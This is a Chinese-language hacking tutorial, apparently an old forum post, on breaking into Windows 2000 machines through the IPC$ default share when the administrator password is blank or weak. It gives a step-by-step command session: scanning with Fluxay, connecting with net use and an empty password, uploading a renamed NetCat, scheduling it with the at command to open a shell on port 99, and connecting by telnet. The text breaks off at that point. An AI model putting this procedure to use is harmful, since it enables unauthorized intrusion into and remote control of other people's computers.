IPC$入侵
IPC$入侵 IPC$是Windows的默认共享。其实,这个共享并没有什么漏洞。 我们可以用主机的管理员用户名和密码连接。 问题就出在管理员密码了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。 我们要寻找这些主机十分简单。只需要一个程序就可以。 下面,我会把以前写的一篇IPC$入侵文章,进行小小的修改。 本次范例需要的系统及程序情况如下: 操作系统:Windows 2000 对方操作系统:Windows 2000 程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP) 程序(二):Srv.exe 程序(三):Ntlm.exe 本机IP:127.0.0.1 测试IP:127.0.0.25 新程序介绍: Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。 Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。 关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。 假设,我们扫描了一台IPC$主机:127.0.0.25 用户名:davis 密码:空 “//”后是注解。 Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-1998 Microsoft Corp. D:>net use \127.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~! 命令成功完成。 D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。 已复制 1 个文件。 D:>net time \127.0.0.25 //查查时间。 \127.0.0.25 的当前时间是 2001/1/17 上午 10:48 命令成功完成。 D:>at \\127.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。 新加了一项作业,其作业 ID = 1 D:>net time \\127.0.0.25 //再查查够时间没有?!噢~~够了~ 127.0.0.25 的当前时间是 2001/1/17 上午 10:51 命令成功完成。 D:>telnet 127.0.0.25 99 //我们telnet吧,注意端口是99哦~ Microsoft Windows 2000 [ |
|